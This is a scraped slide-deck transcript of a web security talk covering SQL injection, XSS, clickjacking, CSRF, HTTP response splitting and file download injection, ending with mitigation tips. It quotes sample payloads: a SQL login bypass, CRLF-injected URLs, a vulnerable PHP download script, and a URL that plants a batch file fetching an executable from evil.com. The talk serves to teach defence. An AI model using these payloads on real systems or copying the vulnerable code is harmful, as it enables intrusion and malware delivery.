Trendy Web Security
-
Upload
lawebdevmeetup -
Category
Documents
-
view
214 -
download
0
Transcript of Trendy Web Security
-
8/14/2019 Trendy Web Security
1/38
Trendy Web Security
-
8/14/2019 Trendy Web Security
2/38
A Review of times past
-
8/14/2019 Trendy Web Security
3/38
SQL Injection
-
8/14/2019 Trendy Web Security
4/38
password' OR 1=1; --
-
8/14/2019 Trendy Web Security
5/38
Parses as:SELECT username FROM users WHERE username =
'username' and password = '' OR 1=1
-
8/14/2019 Trendy Web Security
6/38
And you're in...
-
8/14/2019 Trendy Web Security
7/38
Cross Site Scripting(XSS)
-
8/14/2019 Trendy Web Security
8/38
About-Me fieldI enjoy long walks on the beach, and
-
8/14/2019 Trendy Web Security
9/38
Now, you have yourcode running in
another guy's browser
-
8/14/2019 Trendy Web Security
10/38
Have your code changehis linksys' DNS settings?
-
8/14/2019 Trendy Web Security
11/38
SQL Injections and XSSattacks are old news.
-
8/14/2019 Trendy Web Security
12/38
What's new(er)?
-
8/14/2019 Trendy Web Security
13/38
Click Jacking
-
8/14/2019 Trendy Web Security
14/38
A Demo...
-
8/14/2019 Trendy Web Security
15/38
No JS Needed!
-
8/14/2019 Trendy Web Security
16/38
Cross Site RequestForgery
-
8/14/2019 Trendy Web Security
17/38
-
8/14/2019 Trendy Web Security
18/38
You are now logged outof google.
-
8/14/2019 Trendy Web Security
19/38
Or... had your domainstolen
-
8/14/2019 Trendy Web Security
20/38
CSRF Creates a new Gmail Filter whichforwards certain emails
Hacker sends an email forwarded to yourhost, asking for a transfer + unlock
Hacker transfers your domain away.
-
8/14/2019 Trendy Web Security
21/38
HTTP ResponseSplitting
-
8/14/2019 Trendy Web Security
22/38
/redir_lang.jsp?lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/
1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d
%0aShazam
/redir_lang.jsp?lang=English
-
8/14/2019 Trendy Web Security
23/38
HTTP/1.1 302 Moved Temporarily
Date: Wed, 24 Dec 2003 15:26:41 GMT
Location: http://10.1.1.1/by_lang.jsp?lang=foobar
Content-Length: 0
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 19
ShazamServer: WebLogic XMLX Module 8.1 SP1 Fri Jun 20 23:06:40 PDT
2003 271009 with
Content-Type: text/html
Set-Cookie:
JSESSIONID=1pwxbgHwzeaIIFyaksxqsq92Z0VULcQUcAanfK7In7IyrCST9UsS!-1251019693; path=/Connection: Close
302 Moved Temporarily
This document you requested has moved temporarily.
It's now at http://10.1.1.1/by_lang.jsp?l
ang=foobar
Content-Length: 0
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 19
Shazam.
-
8/14/2019 Trendy Web Security
24/38
Why?
Cache Poisoning
Replace content Phishing
XSS
etc.
-
8/14/2019 Trendy Web Security
25/38
File Download Injection
-
8/14/2019 Trendy Web Security
26/38
An similar idea toresponse splitting
-
8/14/2019 Trendy Web Security
27/38
We've all writtendownload scripts:download.php?file=report.xls
-
8/14/2019 Trendy Web Security
28/38
$filename = basename($_GET["download"]);
header('Content-Disposition: attachment; filename="' . $filename . '"');readfile(basename($_GET["download"]));return;
-
8/14/2019 Trendy Web Security
29/38
http://[trusted_domain]/download.php?file=attack.bat%0d%0a%0d%0aecho%20get%20/pub/winzip/wzinet95.exe|ftp%20-A%20evil.com%0d%0awzinet95.exe
-
8/14/2019 Trendy Web Security
30/38
HTTP/1.1 200 OKDate: Thu, 27 Mar 2008 05:02:24 GMTServer: ApachePath=/download
Content-Disposition: attachment;filename=attack.batContent-length: 88
echo get /pub/winzip/wzinet95.exe|ftp -A evil.comawzinet95.exeContent-Length: 0Content-Type: application/octet-stream;charset=euc-kr
-
8/14/2019 Trendy Web Security
31/38
It's a dangerous world...
-
8/14/2019 Trendy Web Security
32/38
How about someMitigation
-
8/14/2019 Trendy Web Security
33/38
Sensitive stuff inseparate browser?
As a user
-
8/14/2019 Trendy Web Security
34/38
Whitelist everything.Nothing gets through
w/o you knowing
As a programmer:
-
8/14/2019 Trendy Web Security
35/38
GET vs. POST. Usethem correctly.
As a programmer:
-
8/14/2019 Trendy Web Security
36/38
Use the real file name,and not the http
argument
Download Injection:
-
8/14/2019 Trendy Web Security
37/38
-
8/14/2019 Trendy Web Security
38/38
Links http://it.slashdot.org/article.pl?sid=08/09/25/1955228&from=rss
http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf
http://packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf
http://lists.grok.org.uk/pipermail/full-disclosure/2006-February/042358.html
http://www.webappsec.org/lists/websecurity/archive/2008-04/msg00003.html
http://www.aspectsecurity.com/documents/Aspect_File_Download_Injection.pdf
http://www.breakingpointsystems.com/community/blog/clickjacking
http://en.wikipedia.org/wiki/Cross-site_request_forgery
http://www.davidairey.com/google-gmail-security-hijack/
http://www.cyberciti.biz/tips/firefox-stop-clickjacking-attack.html